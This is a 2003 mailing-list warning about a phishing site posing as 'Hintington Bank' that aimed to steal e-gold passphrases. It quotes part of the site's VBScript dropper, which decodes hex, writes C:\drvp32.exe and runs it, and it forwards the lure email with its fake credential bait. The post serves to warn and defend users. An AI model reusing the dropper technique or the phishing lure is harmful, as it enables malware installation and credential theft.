OPEN LETTER to e-gold users and host company of potential fraud website: e-gold users, watch out for websites that may exploit visual basic features of MSexplorer to grab passphrases!
ATTTENTION SERVICE HOSTING WEBSITE ON 69.57.150.82 CHECK your server supporting www.hintington.com, IP address 69.57.150.82 a suspicious forged email with hyperlinks to www.hintington.com which tries to do a data login, maybe to take advantage of MS web browser exploit? Best to open with mozilla or firebird or something w/o visual basic exploits. and afterwards make sure you don't have c:\drvp32.exe on your harddrive even the domain name and its registration are suspect. hinington.com does not exist, hintington.com is has suspicious contancts and the spam originates from around russia area You may want to remove this website ASAP and save any information about its setup if needed for discovery to avoid legal issues! Be careful, www.hintington.com/login.php tries to launch a visual basic script, that appears to write a program to c:\ and then run it.... scary MOST probably to capture e-gold logins (w/ firebird web browser it fails) excerpt with some of the code : <SCRIPT language=vbs> self.MoveTo 6000,6000 b.write(H(************** ..... ..... ..... b.Write(H("")) b.Close Set shell = CreateObject("WScript.Shell") shell.run("C:\drvp32.exe") Function H(H1) Dim H2 Dim H3:H2="" For H3=1 To Len(H1) Step 2 H2=H2&Chr("&h"&Mid(H1,H3,2)) Next H=H2 End Function </SCRIPT> ---------- Forwarded message ---------- Return-Path: <[EMAIL PROTECTED]> Received: from Fred (du-25.ks.ukrpack.net [195.230.129.25]) by list.webengr.com (8.12.9/8.12.9) with SMTP id h7R0UMw7018612 for <[EMAIL PROTECTED]>; Wed, 27 Aug 2003 00:30:26 GMT Message-Id: <[EMAIL PROTECTED]> Reply-To: [EMAIL PROTECTED] From: "Fred"<[EMAIL PROTECTED]> To: "" <[EMAIL PROTECTED]> Subject: Private Information! Sender: "Fred"<[EMAIL PROTECTED]> Mime-Version: 1.0 Content-Type: multipart/alternative;boundary="----=_NextPart_000_0129_01C1ACD9.F0214F00" Date: Wed, 27 Aug 2003 03:46:01 +0300 X-Virus-Scanned: clamdscan / ClamAV version 20030720 X-Spam-Status: No, hits=3.0 required=7.0 tests=HTML_30_40,HTML_MESSAGE,HTML_WIN_OPEN, MSG_ID_ADDED_BY_MTA_3,NO_REAL_NAME version=2.55 X-Spam-Level: *** X-Spam-Checker-Version: SpamAssassin 2.55 (1.174.2.19-2003-05-19-exp) Hello Bob. This is your private information: RetroBank International http://www.retrobank.com Login : Bob3412 Password: R6Ji1uI Hintington Bank http://www.hintington.com Login : Bob3412 Password: Ug2Kl4ty E-gold http://www.e-gold.com E-gold#451287 Pass: tY72Jkw Your money still frozen... Fred mailto: [EMAIL PROTECTED] --- You are currently subscribed to e-gold-tech as: [EMAIL PROTECTED] To unsubscribe send a blank email to [EMAIL PROTECTED] Safe web surfing tip: Get in the habit of checking the SSL key/padlock icon in your browser and address/location bar *before* submitting sensitive information like your e-gold passphrase.